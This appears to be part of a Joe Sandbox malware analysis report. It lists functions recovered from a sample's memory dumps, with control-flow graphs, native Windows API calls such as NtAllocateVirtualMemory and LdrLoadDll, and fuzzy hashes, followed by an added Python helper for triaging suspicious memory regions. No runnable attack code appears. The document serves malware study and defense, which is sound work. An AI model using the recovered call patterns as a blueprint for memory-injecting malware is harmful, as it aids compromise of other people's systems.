• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 264 41a31d-41a31f 265 41a321-41a359 call 41af60 264->265 266 41a376-41a3b1 call 41af60 NtCreateFile 264->266 265->266
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 11dc355c5cb9a2af9d7509fcccf455afcbe189f1a6ce482156f8d8b0dfc07fb4
• Instruction ID: 2973cbcf7785785568ad3b10b83d17c2657cf96aa729a31f32274c086419095a
• Opcode Fuzzy Hash: 11dc355c5cb9a2af9d7509fcccf455afcbe189f1a6ce482156f8d8b0dfc07fb4
• Instruction Fuzzy Hash: 7111A2B2204208AFCB08DF98DC85DEB73ADEF8C754F158649FA1D97241D634E861CBA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 306 40acf0-40ad0c 307 40ad14-40ad19 306->307 308 40ad0f call 41cc50 306->308 309 40ad1b-40ad1e 307->309 310 40ad1f-40ad2d call 41d070 307->310 308->307 313 40ad3d-40ad4e call 41b4a0 310->313 314 40ad2f-40ad3a call 41d2f0 310->314 319 40ad50-40ad64 LdrLoadDll 313->319 320 40ad67-40ad6a 313->320 314->313 319->320
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
• Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 329 41a360-41a3b1 call 41af60 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 333 41a53a-41a556 334 41a55c-41a57d NtAllocateVirtualMemory 333->334 335 41a557 call 41af60 333->335 335->334
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: cbe4be1059a3d2229a6b536ee7ef4b0040425a7573317a7d3156e6b079f8bedf
• Instruction ID: e22161ca23b5782e5b6a534eccc4163cf194bb6cfc05d52a75a5fc13772094ec
• Opcode Fuzzy Hash: cbe4be1059a3d2229a6b536ee7ef4b0040425a7573317a7d3156e6b079f8bedf
• Instruction Fuzzy Hash: 92F0F2B6200208ABCB14DF89DC81EEB77A9EF88654F158249FA199B341C634E911CBA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 336 41a540-41a57d call 41af60 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c438f2b28a67fa50fb823d96871c971358b2efa5221ff826601d0445ca529ad1
• Instruction ID: ccd15f4f5e9f367ae23b7a53e0396d940bb10495947966266a329f4f0d32237d
• Opcode Fuzzy Hash: c438f2b28a67fa50fb823d96871c971358b2efa5221ff826601d0445ca529ad1
• Instruction Fuzzy Hash: 1690023120140843D1807198540464A000597D1301F96C025A0025654DCA598B5977A1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: af5ed90a375e63938bdc3c77ad9d0e53d001ad60ede4f4cb220ca5f7a6aac483
                                                                                                                    • Instruction ID: 75c1df5b5abdca4485f0631c04eb7711ed9af18fd46fc954e6693becebcd4ac6
                                                                                                                    • Opcode Fuzzy Hash: af5ed90a375e63938bdc3c77ad9d0e53d001ad60ede4f4cb220ca5f7a6aac483
                                                                                                                    • Instruction Fuzzy Hash: 3B90026120240043410571985414616400A97E0201F56C031E1014590DC56989916225
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 8a9d58fbd72db647be3416a7762907abf00408f7bc87dea68702cdba580f47bc
                                                                                                                    • Instruction ID: 2de7eabae1fedfa1b36449df57be4ea7615ce7cac15b520e7df093e3a71baa41
                                                                                                                    • Opcode Fuzzy Hash: 8a9d58fbd72db647be3416a7762907abf00408f7bc87dea68702cdba580f47bc
                                                                                                                    • Instruction Fuzzy Hash: F7900435311400430105F5DC17045070047D7D5351757C031F1015550CD775CD715331
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 11b4e3e24ab7b70edd942ab00a7ff32a7f8ff75ee57a0e8a4b74bea57d53b218
                                                                                                                    • Instruction ID: c6ec2017a99274502819de5ec9c181a514f25f2448f35ea4a65a5227e2a3850b
                                                                                                                    • Opcode Fuzzy Hash: 11b4e3e24ab7b70edd942ab00a7ff32a7f8ff75ee57a0e8a4b74bea57d53b218
                                                                                                                    • Instruction Fuzzy Hash: 3090023120140453D11171985504707000997D0241F96C422A0424558DD69A8A52A221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: c36000ec3cf6f387498b8d8525816ec3f6f6d5dc718189454d73869ac99ee9ab
                                                                                                                    • Instruction ID: f66c126153728eef18544a1c08c8206f8d9173b2e4b7386b62071b41aec2ff8c
                                                                                                                    • Opcode Fuzzy Hash: c36000ec3cf6f387498b8d8525816ec3f6f6d5dc718189454d73869ac99ee9ab
                                                                                                                    • Instruction Fuzzy Hash: E5900221242441935545B19854045074006A7E0241B96C022A1414950CC56A9956D721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 1d604430c9c7a8c9614374f8e0915d4350b693fed0ca89ecdc0342b31b2336f1
                                                                                                                    • Instruction ID: 41c73cdec3e3babe47aa49ec82aa9bf71b3f37020d03eec0aadc3c673ddece9c
                                                                                                                    • Opcode Fuzzy Hash: 1d604430c9c7a8c9614374f8e0915d4350b693fed0ca89ecdc0342b31b2336f1
                                                                                                                    • Instruction Fuzzy Hash: F090022130140043D140719864186064005E7E1301F56D021E0414554CD95989565322
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 5c808919cd78e38bbb2ba0b7b3d192fba40f3fcc30b41cfb4d4fe2e52675e7d5
                                                                                                                    • Instruction ID: 3ff5f39755f03757e758b46a475d721da4e8e574897a04e841372911ea118373
                                                                                                                    • Opcode Fuzzy Hash: 5c808919cd78e38bbb2ba0b7b3d192fba40f3fcc30b41cfb4d4fe2e52675e7d5
                                                                                                                    • Instruction Fuzzy Hash: 5490022921340043D1807198640860A000597D1202F96D425A0015558CC95989695321
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 3e1fb22ce3bf837ace7d84b6edb42a6b3f655672ce119a626e55685098342982
                                                                                                                    • Instruction ID: 2e2ffb061ebc3569260190c0eddcf86be3c45de41e08c38147f7267be01d8a52
                                                                                                                    • Opcode Fuzzy Hash: 3e1fb22ce3bf837ace7d84b6edb42a6b3f655672ce119a626e55685098342982
                                                                                                                    • Instruction Fuzzy Hash: 8B90023120140443D10075D86408646000597E0301F56D021A5024555EC6A989916231
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: f10614da6a77360f453a2c16cb599d41d641fc92cf3bff0c3f9c7beb3a4673a8
                                                                                                                    • Instruction ID: db6fe4a158849f01a669b310e54212009f86782cf2b181703206fe8a399efd83
                                                                                                                    • Opcode Fuzzy Hash: f10614da6a77360f453a2c16cb599d41d641fc92cf3bff0c3f9c7beb3a4673a8
                                                                                                                    • Instruction Fuzzy Hash: 5990023120148843D1107198940474A000597D0301F5AC421A4424658DC6D989917221
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 972c86322508cecd3571e076830109896d1f4abc7716ff577761391459d4f38b
                                                                                                                    • Instruction ID: 715ddb131726a26e46d419e89d9501376a5409ef41060e8290340a42f9245adf
                                                                                                                    • Opcode Fuzzy Hash: 972c86322508cecd3571e076830109896d1f4abc7716ff577761391459d4f38b
                                                                                                                    • Instruction Fuzzy Hash: BD90022160140083414071A898449064005BBE1211B56C131A0998550DC59D89655765
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: ac88b3a5e281062618ab1f3df100a2c3a494323a542b235783a01ba804c8aed7
                                                                                                                    • Instruction ID: 01bcb8b4b709c47d00abcd9d623c5bb41d4f7b7b9d99e028b213e1636eae9e4a
                                                                                                                    • Opcode Fuzzy Hash: ac88b3a5e281062618ab1f3df100a2c3a494323a542b235783a01ba804c8aed7
                                                                                                                    • Instruction Fuzzy Hash: 3090023120180443D1007198581470B000597D0302F56C021A1164555DC66989516671
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: e8e4c21c3df333f381a4c437054091d13262134da4a30acee1f521ab2d65a027
                                                                                                                    • Instruction ID: 4c9d90a757eadffbde33e324ddedc27b5c607ce8da81bafe021f97a4c55c0c21
                                                                                                                    • Opcode Fuzzy Hash: e8e4c21c3df333f381a4c437054091d13262134da4a30acee1f521ab2d65a027
                                                                                                                    • Instruction Fuzzy Hash: 1D900221211C0083D20075A85C14B07000597D0303F56C125A0154554CC95989615621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%
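
The records above give, for each function recovered from a memory dump, the dump it came from (the `.sdmp` name, its load offset and whether it was PE-based), the API it resolves to, and its opcode and instruction fuzzy hashes. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses such records into structured form, decodes the `.sdmp` name, and flags functions recovered from writable and executable memory that is not image-backed, which is what turns a long listing like this into a triage list. The `.sdmp` field layout (pid.index.timestamp.base.protect.state.type.reserved) and the hex reading of the pid field are assumptions inferred from the values visible on the page; the protect/state/type constants are the documented Win32 MEMORY_BASIC_INFORMATION values, and the `offset_matches_base`, `triage` and `Region` names are this example's own. The sample input is constructed from two of the listing's own records.

```python
"""Triage helper for Joe Sandbox IDA-plugin similarity records (added example,
not Joe Sandbox code). The .sdmp name layout below is an ASSUMPTION inferred from
the report; PAGE_*/MEM_* values are the documented Win32 constants."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

# Assumed layout: pid.index.timestamp.base.protect.state.type.reserved.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.\d+\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp"
)

# Constructed sample: the listing's partial "Close" record (no Source File line)
# followed by one "InitializeThunk" record, copied with indentation removed.
SAMPLE = """\
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
• Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
• Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: c438f2b28a67fa50fb823d96871c971358b2efa5221ff826601d0445ca529ad1
• Instruction ID: ccd15f4f5e9f367ae23b7a53e0396d940bb10495947966266a329f4f0d32237d
• Opcode Fuzzy Hash: c438f2b28a67fa50fb823d96871c971358b2efa5221ff826601d0445ca529ad1
• Instruction Fuzzy Hash: 1690023120140843D1807198540464A000597D1301F96C025A0025654DCA598B5977A1
Uniqueness

Uniqueness Score: -1.00%
"""


@dataclass
class Region:
    pid: int
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def writable_executable(self) -> bool:
        # Low byte carries the PAGE_* value; higher bits are GUARD/NOCACHE modifiers.
        return (self.protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)

    @property
    def image_backed(self) -> bool:
        return self.mem_type == MEM_IMAGE


def parse_region(source_file: str) -> Region:
    m = SDMP_RE.fullmatch(source_file)
    if m is None:
        raise ValueError(f"unrecognised .sdmp name: {source_file}")
    return Region(int(m["pid"], 16), int(m["base"], 16), int(m["protect"], 16),
                  int(m["state"], 16), int(m["type"], 16))


def _finish(cur: Dict[str, str]) -> dict:
    rec: dict = dict(cur)
    rec["region"] = None
    src = cur.get("Source File")
    if src:  # "<name>.sdmp, Offset: 019C0000, based on PE: true"
        fname, _, rest = src.partition(",")
        rec["region"] = parse_region(fname.strip())
        for part in rest.split(","):
            key, _, value = part.partition(":")
            if key.strip():
                rec[key.strip()] = value.strip()
    return rec


def parse_records(text: str) -> List[dict]:
    """Split the listing on its 'Uniqueness Score' terminator; bullets are fields."""
    records, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("•"):
            key, _, value = line[1:].partition(":")
            cur[key.strip()] = value.strip()
        elif line.startswith("Uniqueness Score:"):
            cur["Uniqueness Score"] = line.partition(":")[2].strip()
            records.append(_finish(cur))
            cur = {}
    if cur:  # listing cut off before its final score line
        records.append(_finish(cur))
    return records


def offset_matches_base(rec: dict) -> bool:
    return rec["region"] is not None and int(rec.get("Offset", "0"), 16) == rec["region"].base


def triage(records: List[dict]) -> List[Tuple[str, str]]:
    findings = []
    for rec in records:
        api, region = rec.get("API ID", "?"), rec["region"]
        if region is None:
            findings.append((api, "no Source File line (record truncated in listing)"))
        elif region.writable_executable and not region.image_backed:
            findings.append((api, f"pid {region.pid}: function at 0x{region.base:X} sits in "
                                  f"RWX non-image memory (protect=0x{region.protect:X}, "
                                  f"type=0x{region.mem_type:X})"))
    return findings


if __name__ == "__main__":
    for api, note in triage(parse_records(SAMPLE)):
        print(f"{api}: {note}")
```

Run against the full listing, `parse_records` yields one dict per function; grouping those by `Instruction ID` (or by `Opcode Fuzzy Hash`) collapses the many near-identical `InitializeThunk` stubs into a handful of distinct functions, and `triage` points at the ones that came from a committed, private, RWX region rather than from the mapped image.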

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 37e74598433bc19dac2249144a5474829b2697c4e56e8bd10754ecfd5cd93b81
                                                                                                                    • Instruction ID: 20c47ee0d70b1c77fd63876bcb2c72a0c82d7a3d32b6e7e2d103711dcc3f81cf
                                                                                                                    • Opcode Fuzzy Hash: 37e74598433bc19dac2249144a5474829b2697c4e56e8bd10754ecfd5cd93b81
                                                                                                                    • Instruction Fuzzy Hash: D890026134140483D10071985414B060005D7E1301F56C025E1064554DC65DCD526226
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: InitializeThunk
• API String ID: 2994545307-0
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
APIs
• RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: AllocateHeap
• String ID: 6EA
• API String ID: 1279760036-1400015478
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 204 408393-408396 205 408398 204->205 206 40831e-40832b call 41be60 204->206 207 40839a-4083f8 call 41be60 call 408310 call 41b750 205->207 208 40832d-40835a call 41ca00 call 40acf0 call 414e50 205->208 206->208 223 408400-408432 call 40f670 call 41a500 207->223 224 40835c-40836e PostThreadMessageW 208->224 225 40838e-408392 208->225 234 408434-40843c 223->234 235 408467-40846f 223->235 227 408370-40838a call 40a480 224->227 228 40838d 224->228 227->228 228->225 236 408456-408460 234->236 237 40843e-408445 234->237 236->223 238 408462-408465 236->238 237->236 239 408447-40844e 237->239 241 40848d-40849f call 41a490 238->241 239->236 240 408450-408454 239->240 240->236 242 408470-40848a call 41bde0 240->242 241->235 247 4084a1-40850c call 419d10 241->247 242->241 247->235 250 408512-40856e call 419d50 247->250 250->235 253 408574-4085c1 call 41b3f0 call 41b410 call 41c0d0 call 41bde0 call 414a50 250->253
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: MessagePostThread
• API String ID: 1836367815-0
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 272 40830a-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 283 40835c-40836e PostThreadMessageW 272->283 284 40838e-408392 272->284 285 408370-40838a call 40a480 283->285 286 40838d 283->286 285->286 286->284
APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
Memory Dump Source
• Source File: 00000002.00000002.1431640685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID: MessagePostThread
• API String ID: 1836367815-0
Uniqueness Score: -1.00%

Control-flow Graph
